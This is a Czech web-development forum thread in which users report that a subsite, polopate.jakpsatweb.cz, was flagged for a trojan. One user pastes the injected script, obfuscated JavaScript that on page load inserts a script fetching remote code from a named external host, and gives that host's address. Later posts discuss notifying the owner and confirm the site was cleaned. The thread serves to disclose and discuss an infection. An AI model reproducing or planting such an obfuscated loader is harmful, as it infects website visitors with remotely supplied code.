Autor Zpráva
zeli
Profil *
Ahoj,

jen jsem chtěl upozornit na to, že mi dnes avast! našel na webu polopatě.jakpsatweb.cz trojana. nebyl jsem tam hodně dlouho, takže to může být docela dlouho...

Doufám že si tohle přečte Yůhů, a něco s tím udělá/řekne mi že jde o planý poplach...

Díky,
David K.
mckay
Profil
zeli:
Možná by bylo dobré uvést na které stránce přesně.
Moderátor Alphard: Ale ne jako klikatelný odkaz.
zeli
Profil *
Omlouvám se, myslel jsem že to bude jasné, prostě na homepage - nevím jak tam je .htaccess a znova tam nepolezu, ale prostě když jsem do prohlížeče zadal polopate.jakpsatweb.cz...
Joker
Profil
Skutečně tam je:

<script>/*GNU GPL*/ 
try{
window.onload = function(){
var Ough2ae2vnvr = document.createElement('s&$)c!r()$i#&$p!$)$t!'.replace(/\)|\^|\$|&|@|\!|#|\(/ig, ''));
Ough2ae2vnvr.setAttribute('type', 'text/javascript');
Ough2ae2vnvr.setAttribute('src',  'h^@t!)!@t^($p$):)&$/$(/#y^&@a$(&h^)o#@$(o!)-$c@(o@-&!)$j^$(p@#&#.(^a^@d@m^i$n^(5$!@.#@#c@#^o$@#m).$g#o()!-@!c&$!o(@#$m$).#!!s&()@)i^&m&!(^#p!(&#$l#)^e@!h&#o^#m&&((e$#l(@i(@&n!!!k$&(.)#r#&&u^^:)$)#8@0&(8@0#)(/$(@g)o)!o$!$g)^l($(e$&#.(#@c@#o(m&/)g$&o!o$#))g#$l!$(e^@^$.)$c@^#o!m#&)#/#(&i^@p^@&!1$#3@^)8)$^.!$))&c!##)o^$m@@$/^^a@^$t$@&@@w#&i&&(k!&()i!.(&)j)#p$$@$/^)t#!^r^$!a)@^v&#@(#i^a$($n)($.^&a#e!!/)@'.replace(/\(|&|\)|#|\!|\^|\$|@/ig, ''))
Ough2ae2vnvr.setAttribute('defer', 'defer');
Ough2ae2vnvr.setAttribute('id', 'O))!!x&$o)$(p)&!e&#i!&l#^!&0)m&)!s^(^)q!#!$)'.replace(/\)|\!|\(|\$|#|&|@|\^/ig, ''));
document.body.appendChild(Ough2ae2vnvr);
}
}
 catch(e) {}
 </script>
Joker
Profil
Další informace:
- Ten kód je na každé stránce, kterou jsem na polopate.jakpsatweb.cz zkoušel
- Skript který to vkládá je prázdný, alespoň u mě. Buď tam výkonný skript (ještě?) není, nebo si možná vybírá jen některé prohlížeče
(poznámka, skript se čte z adresy: http://yahoo-co-jp.admin5.com.go-com.simplehomelink.ru:8080/google.com/google.com/ip138.com/atwiki.jp/travian.ae/ - kdo by chtěl zkontrolovat, jestli se tam neobjeví nějaký kód. Samotné zobrazení té adresy v prohlížeči by mělo být bezpečné)
- V archivu Google jsem našel čistou verzi z 19.12.
- Kdo jste v kontaktu s Yuhůem, můžete mu dát vědět?
Chamurappi
Profil
Reaguji na Jokera:
Kdo jste v kontaktu s Yuhůem, můžete mu dát vědět?
Kdokoli mu může napsat e-mail. Možná by byla vhodnějším adresátem ta slečna, která polopate.jakpsatweb.cz píše, protože jestli někomu uniklo heslo a je infikovaná jen tato část JPW, bude s tím mít asi něco společného.
zeli
Profil *
Já jsem se snažil najít kontakt na Yuhůa a jediné informace co jsem našel vedly sem - do diskuze...
Nemám nějak ultra zabezpečený počítač(comodo, avast, xp aktualizace) a s kódy zas tolik neumím, radši další akce nechám na lidech co tomu rozumí...
btw, [#4] Joker - mě se to stalo v Google chrome 4.0.249.43 (mám pocit že je to ještě beta...)
Bubák
Profil
Koukám, že web polopate.jakpsatweb.cz už je bez breberek.

Vaše odpověď

Mohlo by se hodit


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: